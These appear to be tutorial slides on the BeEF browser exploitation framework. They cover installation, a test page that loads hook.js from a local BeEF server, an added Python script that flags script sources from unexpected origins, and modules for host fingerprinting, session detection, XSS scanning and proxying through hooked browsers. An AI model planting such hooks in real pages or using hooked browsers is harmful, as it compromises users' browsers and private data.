BeEF Advantages
+ demonstrates the impact of browser and Cross Site Scripting in real time
+ professional and simple user interface
+ implemented in Ruby so it will run on most Operating Systems
+ simple API that facilitates quick development of custom modules by the user
+ allows complex scenarios combined with other security tools
Installing
+ On any OS requires Ruby 1.9, bundler gem and sqlite to be installed
+ Download BeEF from SVN
+ Run command ruby install
+ Start with command ruby beef
+ Go to the UI panel address and login
Test installation
+ Make a page from a web server call the script hook.js to hook that page and browser to BeEF
+ Run commands
    <html>
      <head><title>Connected to beef</title></head>
      <body>
        <!-- Loading hook.js from the BeEF server hooks this page and browser -->
        <script src="http://127.0.0.1:3000/hook.js"></script>
        <p>Welcome to our page!</p>
      </body>
    </html>
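Seen from the defending side, the hook is just a script element that loads from an origin the site does not own. The following is an added example, not part of the original slides or of BeEF: it audits a page for script sources outside an allowlist. The page URL http://intranet.example/, the /static/app.js script and the function names are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the test page from the slide plus one same-origin script,
# assumed to be served from http://intranet.example/index.html.
SAMPLE_PAGE = """<html><head><title>Connected to beef</title></head><body>
<script src="http://127.0.0.1:3000/hook.js"></script>
<script src="/static/app.js"></script>
<p>Welcome to our page!</p></body></html>"""


def origin(url):
    """Return (scheme, host, port) with the default port filled in."""
    parts = urlsplit(url)
    default_port = {"http": 80, "https": 443}.get(parts.scheme)
    return (parts.scheme, parts.hostname, parts.port or default_port)


class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> element."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing <script .../> via handle_startendtag.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def unexpected_scripts(html, page_url, allowed_origins=()):
    """List absolute script URLs whose origin is neither the page's own
    origin nor one of allowed_origins."""
    collector = ScriptCollector()
    collector.feed(html)
    allowed = {origin(page_url)} | {origin(o) for o in allowed_origins}
    findings = []
    for src in collector.sources:
        absolute = urljoin(page_url, src)  # resolves relative and // URLs
        if origin(absolute) not in allowed:
            findings.append(absolute)
    return findings


if __name__ == "__main__":
    for url in unexpected_scripts(SAMPLE_PAGE, "http://intranet.example/index.html"):
        print("script from unexpected origin:", url)
```

The same allowlist expressed as a Content-Security-Policy script-src directive makes the browser itself refuse to load a script from an unlisted origin.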
Case Studies
The user of BeEF will control which browser will launch which command module and at which target.
2. Host data
Get system info like number of processors, maximum memory, free memory, total memory, Java version
3. Detect social networks
Command result shows if user is authenticated on Gmail, Facebook, Twitter
4. XSS Rays & Requester
The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS.
5. Tunneling proxy
+ right-click a hooked browser to use as proxy
+ each request sent through the Proxy is recorded in the History panel in the Requester tab
+ click a history item to view the HTTP headers and HTML source of the HTTP response.